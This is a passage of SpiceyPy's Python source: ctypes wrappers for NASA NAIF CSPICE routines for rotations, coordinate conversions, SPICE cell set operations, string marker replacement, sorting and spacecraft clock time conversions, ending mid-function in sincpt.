:param matrix: Rotation matrix.
:type matrix: 3x3-Element Array of floats
:return: Axis of the rotation, Angle through which the rotation is performed
:rtype: tuple
"""
matrix = stypes.toDoubleMatrix(matrix)
axis = stypes.emptyDoubleVector(3)
angle = ctypes.c_double()
libspice.raxisa_c(matrix, axis, ctypes.byref(angle))
return stypes.cVectorToPython(axis), angle.value
@spiceErrorCheck
def rdtext(file, lenout=_default_len_out): # pragma: no cover
"""
Read the next line of text from a text file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rdtext_c.html
:param file: Name of text file.
:type file: str
:param lenout: Available room in output line.
:type lenout: int
:return: Next line from the text file, End-of-file indicator
:rtype: tuple
"""
file = stypes.stringToCharP(file)
line = stypes.stringToCharP(lenout)
lenout = ctypes.c_int(lenout)
eof = ctypes.c_int()
libspice.rdtext_c(file, lenout, line, ctypes.byref(eof))
return stypes.toPythonString(line), bool(eof.value)
@spiceErrorCheck
def reccyl(rectan):
"""
Convert from rectangular to cylindrical coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reccyl_c.html
:param rectan: Rectangular coordinates of a point.
:type rectan: 3-Element Array of floats
:return:
Distance from z axis,
Angle (radians) from xZ plane,
Height above xY plane.
:rtype: tuple
"""
rectan = stypes.toDoubleVector(rectan)
radius = ctypes.c_double(0)
lon = ctypes.c_double(0)
z = ctypes.c_double(0)
libspice.reccyl_c(rectan, ctypes.byref(radius), ctypes.byref(lon),
ctypes.byref(z))
return radius.value, lon.value, z.value
@spiceErrorCheck
def recgeo(rectan, re, f):
"""
Convert from rectangular coordinates to geodetic coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/recgeo_c.html
:param rectan: Rectangular coordinates of a point.
:type rectan: 3-Element Array of floats
:param re: Equatorial radius of the reference spheroid.
:type re: float
:param f: Flattening coefficient.
:type f: float
:return:
Geodetic longitude (radians),
Geodetic latitude (radians),
Altitude above reference spheroid
:rtype: tuple
"""
rectan = stypes.toDoubleVector(rectan)
re = ctypes.c_double(re)
f = ctypes.c_double(f)
longitude = ctypes.c_double(0)
latitude = ctypes.c_double(0)
alt = ctypes.c_double(0)
libspice.recgeo_c(rectan, re, f, ctypes.byref(longitude),
ctypes.byref(latitude), ctypes.byref(alt))
return longitude.value, latitude.value, alt.value
@spiceErrorCheck
def reclat(rectan):
"""
Convert from rectangular coordinates to latitudinal coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reclat_c.html
:param rectan: Rectangular coordinates of a point.
:type rectan: 3-Element Array of floats
:return: Distance from the origin, Longitude in radians, Latitude in radians
:rtype: tuple
"""
rectan = stypes.toDoubleVector(rectan)
radius = ctypes.c_double(0)
longitude = ctypes.c_double(0)
latitude = ctypes.c_double(0)
libspice.reclat_c(rectan, ctypes.byref(radius), ctypes.byref(longitude),
ctypes.byref(latitude))
return radius.value, longitude.value, latitude.value
@spiceErrorCheck
def recpgr(body, rectan, re, f):
"""
Convert rectangular coordinates to planetographic coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/recpgr_c.html
:param body: Body with which coordinate system is associated.
:type body: str
:param rectan: Rectangular coordinates of a point.
:type rectan: 3-Element Array of floats
:param re: Equatorial radius of the reference spheroid.
:type re: float
:param f: Flattening coefficient.
:type f: float
:return:
Planetographic longitude (radians),
Planetographic latitude (radians),
Altitude above reference spheroid
:rtype: tuple
"""
body = stypes.stringToCharP(body)
rectan = stypes.toDoubleVector(rectan)
re = ctypes.c_double(re)
f = ctypes.c_double(f)
lon = ctypes.c_double()
lat = ctypes.c_double()
alt = ctypes.c_double()
libspice.recpgr_c(body, rectan, re, f, ctypes.byref(lon), ctypes.byref(lat),
ctypes.byref(alt))
return lon.value, lat.value, alt.value
@spiceErrorCheck
def recrad(rectan):
"""
Convert rectangular coordinates to range, right ascension, and declination.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/recrad_c.html
:param rectan: Rectangular coordinates of a point.
:type rectan: 3-Element Array of floats
:return:
Distance of the point from the origin,
Right ascension in radians,
Declination in radians
:rtype: tuple
"""
rectan = stypes.toDoubleVector(rectan)
outrange = ctypes.c_double()
ra = ctypes.c_double()
dec = ctypes.c_double()
libspice.recrad_c(rectan, ctypes.byref(outrange), ctypes.byref(ra),
ctypes.byref(dec))
return outrange.value, ra.value, dec.value
@spiceErrorCheck
def recsph(rectan):
"""
Convert from rectangular coordinates to spherical coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/recrad_c.html
:param rectan: Rectangular coordinates of a point.
:type rectan: 3-Element Array of floats
:return:
Distance from the origin,
Angle from the positive Z-axis,
Longitude in radians.
:rtype: tuple
"""
rectan = stypes.toDoubleVector(rectan)
r = ctypes.c_double()
colat = ctypes.c_double()
lon = ctypes.c_double()
libspice.recsph_c(rectan, ctypes.byref(r), ctypes.byref(colat),
ctypes.byref(lon))
return r.value, colat.value, lon.value
@spiceErrorCheck
def removc(item, inset):
"""
Remove an item from a character set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/removc_c.html
:param item: Item to be removed.
:type item: str
:param inset: Set to be updated.
:type inset: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(inset, stypes.SpiceCell)
assert inset.dtype == 0
item = stypes.stringToCharP(item)
libspice.removc_c(item, ctypes.byref(inset))
@spiceErrorCheck
def removd(item, inset):
"""
Remove an item from a double precision set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/removd_c.html
:param item: Item to be removed.
:type item: float
:param inset: Set to be updated.
:type inset: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(inset, stypes.SpiceCell)
assert inset.dtype == 1
item = ctypes.c_double(item)
libspice.removd_c(item, ctypes.byref(inset))
@spiceErrorCheck
def removi(item, inset):
"""
Remove an item from an integer set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/removi_c.html
:param item: Item to be removed.
:type item: int
:param inset: Set to be updated.
:type inset: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(inset, stypes.SpiceCell)
assert inset.dtype == 2
item = ctypes.c_int(item)
libspice.removi_c(item, ctypes.byref(inset))
@spiceErrorCheck
def reordc(iorder, ndim, lenvals, array):
"""
Re-order the elements of an array of character strings
according to a given order vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reordc_c.html
:param iorder: Order vector to be used to re-order array.
:type iorder: Array of ints
:param ndim: Dimension of array.
:type ndim: int
:param lenvals: String length.
:type lenvals: int
:param array: Array to be re-ordered.
:type array: Array of strs
:return: Re-ordered Array.
:rtype: Array of strs
"""
iorder = stypes.toIntVector(iorder)
ndim = ctypes.c_int(ndim)
lenvals = ctypes.c_int(lenvals + 1)
array = stypes.listToCharArray(array, xLen=lenvals, yLen=ndim)
libspice.reordc_c(iorder, ndim, lenvals, array)
return [stypes.toPythonString(x.value) for x in array]
@spiceErrorCheck
def reordd(iorder, ndim, array):
"""
Re-order the elements of a double precision array according to
a given order vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reordd_c.html
:param iorder: Order vector to be used to re-order array.
:type iorder: Array of ints
:param ndim: Dimension of array.
:type ndim: int
:param array: Array to be re-ordered.
:type array: Array of floats
:return: Re-ordered Array.
:rtype: Array of floats
"""
iorder = stypes.toIntVector(iorder)
ndim = ctypes.c_int(ndim)
array = stypes.toDoubleVector(array)
libspice.reordd_c(iorder, ndim, array)
return stypes.cVectorToPython(array)
@spiceErrorCheck
def reordi(iorder, ndim, array):
"""
Re-order the elements of an integer array according to
a given order vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reordi_c.html
:param iorder: Order vector to be used to re-order array.
:type iorder: Array of ints
:param ndim: Dimension of array.
:type ndim: int
:param array: Array to be re-ordered.
:type array: Array of ints
:return: Re-ordered Array.
:rtype: Array of ints
"""
iorder = stypes.toIntVector(iorder)
ndim = ctypes.c_int(ndim)
array = stypes.toIntVector(array)
libspice.reordi_c(iorder, ndim, array)
return stypes.cVectorToPython(array)
@spiceErrorCheck
def reordl(iorder, ndim, array):
"""
Re-order the elements of a logical (Boolean) array according to
a given order vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reordl_c.html
:param iorder: Order vector to be used to re-order array.
:type iorder: Array of ints
:param ndim: Dimension of array.
:type ndim: int
:param array: Array to be re-ordered.
:type array: Array of ints
:return: Re-ordered Array.
:rtype: Array of bools
"""
iorder = stypes.toIntVector(iorder)
ndim = ctypes.c_int(ndim)
array = stypes.toIntVector(array)
libspice.reordl_c(iorder, ndim, array)
return stypes.cIntVectorToBoolPython(array)
@spiceErrorCheck
def repmc(instr, marker, value, lenout=None):
"""
Replace a marker with a character string.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmc_c.html
:param instr: Input string.
:type instr: str
:param marker: Marker to be replaced.
:type marker: str
:param value: Replacement value.
:type value: str
:param lenout: Optional available space in output string
:type lenout: int
:return: Output string.
:rtype: str
"""
if lenout is None:
lenout = ctypes.c_int(len(instr) + len(value) + len(marker) + 15)
instr = stypes.stringToCharP(instr)
marker = stypes.stringToCharP(marker)
value = stypes.stringToCharP(value)
out = stypes.stringToCharP(lenout)
libspice.repmc_c(instr, marker, value, lenout, out)
return stypes.toPythonString(out)
@spiceErrorCheck
def repmct(instr, marker, value, repcase, lenout=None):
"""
Replace a marker with the text representation of a
cardinal number.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmc_c.html
:param instr: Input string.
:type instr: str
:param marker: Marker to be replaced.
:type marker: str
:param value: Replacement value.
:type value: int
:param repcase: Case of replacement text.
:type repcase: str
:param lenout: Optional available space in output string
:type lenout: int
:return: Output string.
:rtype: str
"""
if lenout is None:
lenout = ctypes.c_int(len(instr) + len(marker) + 15)
instr = stypes.stringToCharP(instr)
marker = stypes.stringToCharP(marker)
value = ctypes.c_int(value)
repcase = ctypes.c_char(repcase.encode(encoding='UTF-8'))
out = stypes.stringToCharP(lenout)
libspice.repmct_c(instr, marker, value, repcase, lenout, out)
return stypes.toPythonString(out)
@spiceErrorCheck
def repmd(instr, marker, value, sigdig):
"""
Replace a marker with a double precision number.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmd_c.html
:param instr: Input string.
:type instr: str
:param marker: Marker to be replaced.
:type marker: str
:param value: Replacement value.
:type value: float
:param sigdig: Significant digits in replacement text.
:type sigdig: int
:return: Output string.
:rtype: str
"""
lenout = ctypes.c_int(len(instr) + len(marker) + 15)
instr = stypes.stringToCharP(instr)
marker = stypes.stringToCharP(marker)
value = ctypes.c_double(value)
sigdig = ctypes.c_int(sigdig)
out = stypes.stringToCharP(lenout)
libspice.repmd_c(instr, marker, value, sigdig, lenout, out)
return stypes.toPythonString(out)
@spiceErrorCheck
def repmf(instr, marker, value, sigdig, informat, lenout=None):
"""
Replace a marker in a string with a formatted double precision value.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmf_c.html
:param instr: Input string.
:type instr: str
:param marker: Marker to be replaced.
:type marker: str
:param value: Replacement value.
:type value: float
:param sigdig: Significant digits in replacement text.
:type sigdig: int
:param informat: Format 'E' or 'F'.
:type informat: str
:param lenout: Optional available space in output string.
:type lenout: int
:return: Output string.
:rtype: str
"""
if lenout is None:
lenout = ctypes.c_int(len(instr) + len(marker) + 15)
instr = stypes.stringToCharP(instr)
marker = stypes.stringToCharP(marker)
value = ctypes.c_double(value)
sigdig = ctypes.c_int(sigdig)
informat = ctypes.c_char(informat.encode(encoding='UTF-8'))
out = stypes.stringToCharP(lenout)
libspice.repmf_c(instr, marker, value, sigdig, informat, lenout, out)
return stypes.toPythonString(out)
@spiceErrorCheck
def repmi(instr, marker, value, lenout=None):
"""
Replace a marker with an integer.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmi_c.html
:param instr: Input string.
:type instr: str
:param marker: Marker to be replaced.
:type marker: str
:param value: Replacement value.
:type value: int
:param lenout: Optional available space in output string.
:type lenout: int
:return: Output string.
:rtype: str
"""
if lenout is None:
lenout = ctypes.c_int(len(instr) + len(marker) + 15)
instr = stypes.stringToCharP(instr)
marker = stypes.stringToCharP(marker)
value = ctypes.c_int(value)
out = stypes.stringToCharP(lenout)
libspice.repmi_c(instr, marker, value, lenout, out)
return stypes.toPythonString(out)
@spiceErrorCheck
def repmot(instr, marker, value, repcase, lenout=None):
"""
Replace a marker with the text representation of an ordinal number.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/repmot_c.html
:param instr: Input string.
:type instr: str
:param marker: Marker to be replaced.
:type marker: str
:param value: Replacement value.
:type value: int
:param repcase: Case of replacement text.
:type repcase: str
:param lenout: Optional available space in output string.
:type lenout: int
:return: Output string.
:rtype: str
"""
if lenout is None:
lenout = ctypes.c_int(len(instr) + len(marker) + 15)
instr = stypes.stringToCharP(instr)
marker = stypes.stringToCharP(marker)
value = ctypes.c_int(value)
repcase = ctypes.c_char(repcase.encode(encoding='UTF-8'))
out = stypes.stringToCharP(lenout)
libspice.repmot_c(instr, marker, value, repcase, lenout, out)
return stypes.toPythonString(out)
def reset():
"""
Reset the SPICE error status to a value of "no error."
As a result, the status routine, failed, will return a value
of False
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/reset_c.html
"""
libspice.reset_c()
@spiceErrorCheck
def return_c():
"""
True if SPICE routines should return immediately upon entry.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/return_c.html
:return: True if SPICE routines should return immediately upon entry.
:rtype: bool
"""
return bool(libspice.return_c())
@spiceErrorCheck
def rotate(angle, iaxis):
"""
Calculate the 3x3 rotation matrix generated by a rotation
of a specified angle about a specified axis. This rotation
is thought of as rotating the coordinate system.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rotate_c.html
:param angle: Angle of rotation (radians).
:type angle: float
:param iaxis: Axis of rotation X=1, Y=2, Z=3.
:type iaxis: int
:return: Resulting rotation matrix
:rtype: 3x3-Element Array of floats
"""
angle = ctypes.c_double(angle)
iaxis = ctypes.c_int(iaxis)
mout = stypes.emptyDoubleMatrix()
libspice.rotate_c(angle, iaxis, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def rotmat(m1, angle, iaxis):
"""
Rotmat applies a rotation of angle radians about axis iaxis to a
matrix. This rotation is thought of as rotating the coordinate
system.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rotmat_c.html
:param m1: Matrix to be rotated.
:type m1: 3x3-Element Array of floats
:param angle: Angle of rotation (radians).
:type angle: float
:param iaxis: Axis of rotation X=1, Y=2, Z=3.
:type iaxis: int
:return: Resulting rotated matrix.
:rtype: 3x3-Element Array of floats
"""
m1 = stypes.toDoubleMatrix(m1)
angle = ctypes.c_double(angle)
iaxis = ctypes.c_int(iaxis)
mout = stypes.emptyDoubleMatrix()
libspice.rotmat_c(m1, angle, iaxis, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def rotvec(v1, angle, iaxis):
"""
Transform a vector to a new coordinate system rotated by angle
radians about axis iaxis. This transformation rotates v1 by
angle radians about the specified axis.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rotvec_c.html
:param v1: Vector whose coordinate system is to be rotated.
:type v1: 3-Element Array of floats
:param angle: Angle of rotation (radians).
:type angle: float
:param iaxis: Axis of rotation X=1, Y=2, Z=3.
:type iaxis: int
:return: the vector expressed in the new coordinate system.
:rtype: 3-Element Array of floats
"""
v1 = stypes.toDoubleVector(v1)
angle = ctypes.c_double(angle)
iaxis = ctypes.c_int(iaxis)
vout = stypes.emptyDoubleVector(3)
libspice.rotvec_c(v1, angle, iaxis, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def rpd():
"""
Return the number of radians per degree.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rpd_c.html
:return: The number of radians per degree, pi/180.
:rtype: float
"""
return libspice.rpd_c()
@spiceErrorCheck
def rquad(a, b, c):
"""
Find the roots of a quadratic equation.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rquad_c.html
:param a: Coefficient of quadratic term.
:type a: float
:param b: Coefficient of linear term.
:type b: float
:param c: Constant.
:type c: float
:return: Root built from positive and negative discriminant term.
:rtype: tuple
"""
a = ctypes.c_double(a)
b = ctypes.c_double(b)
c = ctypes.c_double(c)
root1 = stypes.emptyDoubleVector(2)
root2 = stypes.emptyDoubleVector(2)
libspice.rquad_c(a, b, c, root1, root2)
return stypes.cVectorToPython(root1), stypes.cVectorToPython(root2)
################################################################################
# S
@spiceErrorCheck
def saelgv(vec1, vec2):
"""
Find semi-axis vectors of an ellipse generated by two arbitrary
three-dimensional vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/saelgv_c.html
:param vec1: First vector used to generate an ellipse.
:type vec1: 3-Element Array of floats
:param vec2: Second vector used to generate an ellipse.
:type vec2: 3-Element Array of floats
:return: Semi-major axis of ellipse, Semi-minor axis of ellipse.
:rtype: tuple
"""
vec1 = stypes.toDoubleVector(vec1)
vec2 = stypes.toDoubleVector(vec2)
smajor = stypes.emptyDoubleVector(3)
sminor = stypes.emptyDoubleVector(3)
libspice.saelgv_c(vec1, vec2, smajor, sminor)
return stypes.cVectorToPython(smajor), stypes.cVectorToPython(sminor)
@spiceErrorCheck
def scard(incard, cell):
"""
Set the cardinality of a SPICE cell of any data type.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scard_c.html
:param incard: Cardinality of (number of elements in) the cell.
:type incard: int
:param cell: The cell.
:type cell: spiceypy.utils.support_types.SpiceCell
:return: The updated Cell.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(cell, stypes.SpiceCell)
incard = ctypes.c_int(incard)
libspice.scard_c(incard, ctypes.byref(cell))
return cell
@spiceErrorCheck
def scdecd(sc, sclkdp, lenout=_default_len_out, MXPART=None):
# todo: figure out how to use mxpart
"""
Convert double precision encoding of spacecraft clock time into
a character representation.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scdecd_c.html
:param sc: NAIF spacecraft identification code.
:type sc: int
:param sclkdp: Encoded representation of a spacecraft clock count.
:type sclkdp: float
:param lenout: Maximum allowed length of output SCLK string.
:type lenout: int
:param MXPART: Maximum number of spacecraft clock partitions.
:type MXPART: int
:return: Character representation of a clock count.
:rtype: str
"""
sc = ctypes.c_int(sc)
sclkdp = ctypes.c_double(sclkdp)
sclkch = stypes.stringToCharP(" " * lenout)
lenout = ctypes.c_int(lenout)
libspice.scdecd_c(sc, sclkdp, lenout, sclkch)
return stypes.toPythonString(sclkch)
@spiceErrorCheck
def sce2c(sc, et):
"""
Convert ephemeris seconds past J2000 (ET) to continuous encoded
spacecraft clock "ticks". Non-integral tick values may be
returned.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sce2c_c.html
:param sc: NAIF spacecraft ID code.
:type sc: int
:param et: Ephemeris time, seconds past J2000.
:type et: float
:return:
SCLK, encoded as ticks since spacecraft clock start.
sclkdp need not be integral.
:rtype: float
"""
sc = ctypes.c_int(sc)
et = ctypes.c_double(et)
sclkdp = ctypes.c_double()
libspice.sce2c_c(sc, et, ctypes.byref(sclkdp))
return sclkdp.value
@spiceErrorCheck
def sce2s(sc, et, lenout=_default_len_out):
"""
Convert an epoch specified as ephemeris seconds past J2000 (ET) to a
character string representation of a spacecraft clock value (SCLK).
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sce2s_c.html
:param sc: NAIF spacecraft clock ID code.
:type sc: int
:param et: Ephemeris time, specified as seconds past J2000.
:type et: float
:param lenout: Maximum length of output string.
:type lenout: int
:return: An SCLK string.
:rtype: str
"""
sc = ctypes.c_int(sc)
et = ctypes.c_double(et)
sclkch = stypes.stringToCharP(" " * lenout)
lenout = ctypes.c_int(lenout)
libspice.sce2s_c(sc, et, lenout, sclkch)
return stypes.toPythonString(sclkch)
@spiceErrorCheck
def sce2t(sc, et):
"""
Convert ephemeris seconds past J2000 (ET) to integral
encoded spacecraft clock ("ticks"). For conversion to
fractional ticks, (required for C-kernel production), see
the routine :func:`sce2c`.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sce2t_c.html
:param sc: NAIF spacecraft ID code.
:type sc: int
:param et: Ephemeris time, seconds past J2000.
:type et: float
:return: SCLK, encoded as ticks since spacecraft clock start.
:rtype: float
"""
sc = ctypes.c_int(sc)
et = ctypes.c_double(et)
sclkdp = ctypes.c_double()
libspice.sce2t_c(sc, et, ctypes.byref(sclkdp))
return sclkdp.value
@spiceErrorCheck
def scencd(sc, sclkch, MXPART=None):
"""
Encode character representation of spacecraft clock time into a
double precision number.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scencd_c.html
:param sc: NAIF spacecraft identification code.
:type sc: int
:param sclkch: Character representation of a spacecraft clock.
:type sclkch: str
:param MXPART: Maximum number of spacecraft clock partitions.
:type MXPART: int
:return: Encoded representation of the clock count.
:rtype: float
"""
sc = ctypes.c_int(sc)
sclkch = stypes.stringToCharP(sclkch)
sclkdp = ctypes.c_double()
libspice.scencd_c(sc, sclkch, ctypes.byref(sclkdp))
return sclkdp.value
@spiceErrorCheck
def scfmt(sc, ticks, lenout=_default_len_out):
"""
Convert encoded spacecraft clock ticks to character clock format.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scfmt_c.html
:param sc: NAIF spacecraft identification code.
:type sc: int
:param ticks: Encoded representation of a spacecraft clock count.
:type ticks: float
:param lenout: Maximum allowed length of output string.
:type lenout: int
:return: Character representation of a clock count.
:rtype: str
"""
sc = ctypes.c_int(sc)
ticks = ctypes.c_double(ticks)
clkstr = stypes.stringToCharP(lenout)
lenout = ctypes.c_int(lenout)
libspice.scfmt_c(sc, ticks, lenout, clkstr)
return stypes.toPythonString(clkstr)
@spiceErrorCheck
def scpart(sc):
"""
Get spacecraft clock partition information from a spacecraft
clock kernel file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scpart_c.html
:param sc: NAIF spacecraft identification code.
:type sc: int
:return:
The number of spacecraft clock partitions,
Array of partition start times,
Array of partition stop times.
:rtype: tuple
"""
sc = ctypes.c_int(sc)
nparts = ctypes.c_int()
pstart = stypes.emptyDoubleVector(9999)
pstop = stypes.emptyDoubleVector(9999)
libspice.scpart_c(sc, nparts, pstart, pstop)
return stypes.cVectorToPython(pstart)[0:nparts.value], stypes.cVectorToPython(
pstop)[0:nparts.value]
@spiceErrorCheck
def scs2e(sc, sclkch):
"""
Convert a spacecraft clock string to ephemeris seconds past J2000 (ET).
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/scs2e_c.html
:param sc: NAIF integer code for a spacecraft.
:type sc: int
:param sclkch: An SCLK string.
:type sclkch: str
:return: Ephemeris time, seconds past J2000.
:rtype: float
"""
sc = ctypes.c_int(sc)
sclkch = stypes.stringToCharP(sclkch)
et = ctypes.c_double()
libspice.scs2e_c(sc, sclkch, ctypes.byref(et))
return et.value
@spiceErrorCheck
def sct2e(sc, sclkdp):
"""
Convert encoded spacecraft clock ("ticks") to ephemeris
seconds past J2000 (ET).
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sct2e_c.html
:param sc: NAIF spacecraft ID code.
:type sc: int
:param sclkdp: SCLK, encoded as ticks since spacecraft clock start.
:type sclkdp: float
:return: Ephemeris time, seconds past J2000.
:rtype: float
"""
sc = ctypes.c_int(sc)
sclkdp = ctypes.c_double(sclkdp)
et = ctypes.c_double()
libspice.sct2e_c(sc, sclkdp, ctypes.byref(et))
return et.value
@spiceErrorCheck
def sctiks(sc, clkstr):
"""
Convert a spacecraft clock format string to number of "ticks".
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sctiks_c.html
:param sc: NAIF spacecraft identification code.
:type sc: int
:param clkstr: Character representation of a spacecraft clock.
:type clkstr: str
:return: Number of ticks represented by the clock string.
:rtype: float
"""
sc = ctypes.c_int(sc)
clkstr = stypes.stringToCharP(clkstr)
ticks = ctypes.c_double()
libspice.sctiks_c(sc, clkstr, ctypes.byref(ticks))
return ticks.value
@spiceErrorCheck
def sdiff(a, b):
"""
Take the symmetric difference of two sets of any data type to form a
third set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sdiff_c.html
:param a: First input set.
:type a: spiceypy.utils.support_types.SpiceCell
:param b: Second input set.
:type b: spiceypy.utils.support_types.SpiceCell
:return: Symmetric difference of a and b.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(a, stypes.SpiceCell)
assert isinstance(b, stypes.SpiceCell)
assert a.dtype == b.dtype
# The next line was redundant with the [raise NotImplementedError] line below
# assert a.dtype == 0 or a.dtype == 1 or a.dtype == 2
if a.dtype is 0:
c = stypes.SPICECHAR_CELL(a.size, a.length)
elif a.dtype is 1:
c = stypes.SPICEDOUBLE_CELL(a.size)
elif a.dtype is 2:
c = stypes.SPICEINT_CELL(a.size)
else:
raise NotImplementedError
libspice.sdiff_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
return c
@spiceErrorCheck
def set_c(a, op, b):
"""
Given a relational operator, compare two sets of any data type.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/set_c.html
:param a: First set.
:type a: spiceypy.utils.support_types.SpiceCell
:param op: Comparison operator.
:type op: str
:param b: Second set.
:type b: spiceypy.utils.support_types.SpiceCell
:return: The function returns the result of the comparison.
:rtype: bool
"""
assert isinstance(a, stypes.SpiceCell)
assert isinstance(b, stypes.SpiceCell)
assert a.dtype == b.dtype
assert isinstance(op, str)
op = stypes.stringToCharP(op)
return bool(libspice.set_c(ctypes.byref(a), op, ctypes.byref(b)))
@spiceErrorCheck
def setmsg(message):
"""
Set the value of the current long error message.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/setmsg_c.html
:param message: A long error message.
:type message: str
"""
message = stypes.stringToCharP(message)
libspice.setmsg_c(message)
@spiceErrorCheck
def shellc(ndim, lenvals, array):
# This works! looks like this is a mutable 2d char array
"""
Sort an array of character strings according to the ASCII
collating sequence using the Shell Sort algorithm.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/shellc_c.html
:param ndim: Dimension of the array.
:type ndim: int
:param lenvals: String length.
:type lenvals: int
:param array: The array to be sorted.
:type array: list of str.
:return: The sorted array.
:rtype: list of str.
"""
array = stypes.listToCharArray(array, xLen=lenvals, yLen=ndim)
ndim = ctypes.c_int(ndim)
lenvals = ctypes.c_int(lenvals)
libspice.shellc_c(ndim, lenvals, ctypes.byref(array))
return stypes.cVectorToPython(array)
@spiceErrorCheck
def shelld(ndim, array):
# Works!, use this as example for "I/O" parameters
"""
Sort a double precision array using the Shell Sort algorithm.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/shelld_c.html
:param ndim: Dimension of the array.
:type ndim: int
:param array: The array to be sorted.
:type array: Array of floats
:return: The sorted array.
:rtype: Array of floats
"""
array = stypes.toDoubleVector(array)
ndim = ctypes.c_int(ndim)
libspice.shelld_c(ndim, ctypes.cast(array, ctypes.POINTER(ctypes.c_double)))
return stypes.cVectorToPython(array)
@spiceErrorCheck
def shelli(ndim, array):
# Works!, use this as example for "I/O" parameters
"""
Sort an integer array using the Shell Sort algorithm.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/shelli_c.html
:param ndim: Dimension of the array.
:type ndim: int
:param array: The array to be sorted.
:type array: Array of ints
:return: The sorted array.
:rtype: Array of ints
"""
array = stypes.toIntVector(array)
ndim = ctypes.c_int(ndim)
libspice.shelli_c(ndim, ctypes.cast(array, ctypes.POINTER(ctypes.c_int)))
return stypes.cVectorToPython(array)
def sigerr(message):
"""
Inform the CSPICE error processing mechanism that an error has
occurred, and specify the type of error.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sigerr_c.html
:param message: A short error message.
:type message: str
"""
message = stypes.stringToCharP(message)
libspice.sigerr_c(message)
@spiceErrorCheck
@spiceFoundExceptionThrower
def sincpt(method, target, et, fixref, abcorr, obsrvr, dref, dvec):
"""
Given an observer and a direction vector defining a ray, compute
the surface intercept of the ray on a target body at a specified
epoch, optionally corrected for light time and stellar
aberration.
This routine supersedes :func:`srfxpt`.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sincpt_c.html
:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param et: Epoch in ephemeris seconds past J2000 TDB.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param abcorr: Aberration correction.
:type abcorr: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:param dref: Reference frame of ray's direction vector.
:type dref: str
:param dvec: Ray's direction vector.
:type dvec: 3-Element Array of floats
:return:
Surface intercept point on the target body,
Intercept epoch,
Vector from observer to intercept point.
:rtype: tuple
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
dref = stypes.stringToCharP(dref)
dvec = stypes.toDoubleVector(dvec)
spoint = stypes.emptyDoubleVector(3)
trgepc = ctypes.c_double(0)
srfvec = stypes.emptyDoubleVector(3)
found = ctypes.c_int(0)
libspice.sincpt_c(method, target, et, fixref, abcorr, obsrvr, dref, dvec,
